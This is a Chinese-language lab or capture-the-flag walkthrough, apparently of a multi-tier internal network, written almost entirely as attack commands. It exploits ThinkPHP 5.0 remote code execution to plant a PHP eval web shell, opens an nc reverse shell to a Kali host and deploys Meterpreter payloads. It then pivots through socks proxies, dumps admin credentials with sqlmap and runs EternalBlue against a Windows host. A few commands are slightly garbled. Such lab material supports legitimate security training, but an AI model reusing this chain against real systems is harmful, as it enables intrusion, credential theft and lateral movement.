nmap扫描
nmap -sV -p1-65535 192.168.1.135
thinkphp5.0版本
找到poc进行测试
http://192.168.1.135/index.php?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://192.168.1.135/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > 1.php
写入成功
进行转义
http://192.168.1.135/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" >2.php
或者使用base64位编码
<?php @eval($_POST['cmd']);?>
转码位
PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=
http://192.168.1.103/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4="| base64 -d > 3.php
反弹kali
nc 192.168.1.104 6666 -e /bin/bash
kali获取bash
python -c 'import pty;pty.spawn("/bin/bash")'
flag
msf生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=1234 -f elf >1.elf
蚁剑上传
chmod 777 1.elf
./elf
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 1234
msf5 exploit(multi/handler) > run
获取当前的网段
run get_local_subnets
添加理由
run autoroute -s 192.168.22.0/24
run autoroute -p
内网扫描
msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24
msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128
设置socks4a代理
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2222
srvport => 2222
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) >
修改proxychains
vim /etc/proxychains.conf
socks4 192.168.1.128 2222
proxychains nmap -Pn -sT 192.168.22.129
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT:扫描TCP数据包已建立的连接connect
代理打开80网站
proxychains dirb http://192.168.22.129
注入
proxychains sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword
proxychains sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword --dbs
proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns
proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password –dump
admin | 46f94c8de14fb36680850768ff1b7f2a (123qwe)
登录后台
设置proxifier
msf生成木马
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=432 -f elf > 5.elf
这次代理使用的bindtcp是Target2作为监听
proxychains msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 432
msf5 exploit(multi/handler) > run
获取当前网段
run get_local_subnets
添加路由
run autoroute -s 192.168.33.0/24
run autoroute -p
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2223
srvport => 2223
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 2.
[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) >
修改proxychains
vim /etc/proxychains.conf
socks4 127.0.0.1 2223
探测33网段
use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24
msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128
端口扫描
proxychains nmap -Pn -sT 192.168.33.33
开放了445和3389端口
auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.33.33
rhosts => 192.168.33.33
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.33.33
rhost => 192.168.33.33
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.33.33
RHOST => 192.168.33.33
msf5 exploit(windows/smb/ms17_010_psexec) > run
65001 UTF-8代码页 解决乱码
chcp 65001
